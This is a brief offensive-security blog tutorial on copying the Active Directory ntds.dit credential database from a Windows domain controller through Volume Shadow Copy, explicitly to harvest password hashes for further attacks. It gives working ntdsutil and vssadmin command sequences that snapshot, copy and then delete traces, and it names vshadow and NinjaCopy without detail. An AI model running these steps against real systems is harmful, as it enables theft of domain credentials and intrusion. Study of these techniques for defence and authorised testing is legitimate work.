The blog introduces and summarizes several ways to get ntds.dit file by vss which is preinstalled in Windows and decrypt the file to get the hash which can be used in other attack. As a result, the blog comprises two parts. I use the following two blogs by 3gstudent and ropnop for reference.
Export the NTDS.dit via VSS
VSS, the abbreviation of Volume Shadow Copy Service, is used to implement the manual or automatic backup copies even when they are in use. It contains a set of COM interfaces that implements a framework to allow volume backups to be performed while applications on a system continue to write to the volumes.
Step 1: Acquire the ntds.dit
Method 1: ntdsutil
- list snapshots:
ntdsutil snapshot "List All" quit quit - create snapshot:
ntdsutil snapshot "activate instance ntds" create quit quit - load the snapshot:
ntdsutil snapshot "mount {ef0cadb1-a0f0-46c2-a4de-d6faaef0e199}" quit quit - copy ntds.dit:
copy C:\$SNAP_201810291848_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit - unload the snapshot:
ntdsutil snapshot "unmount {ef0cadb1-a0f0-46c2-a4de-d6faaef0e199}" quit quit - delete the snapshot:
ntdsutil snapshot "delete {ef0cadb1-a0f0-46c2-a4de-d6faaef0e199}" quit quit
Method 2: vssadmin
Supported by windows 2008 or later and Administrator privilege needed
- search current existing shadow:
vssadmin list shadows - create the shadow:
vssadmin create shadow /for=c: - copy ntds.dit:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit c:\ntds.dit - delete the shadow:
vssadmin delete shadows /for=c: /quiet
Method 3: vshadow
Method 4: NinjaCopy
Step 2: Decrypt the ntds.dit by system hive
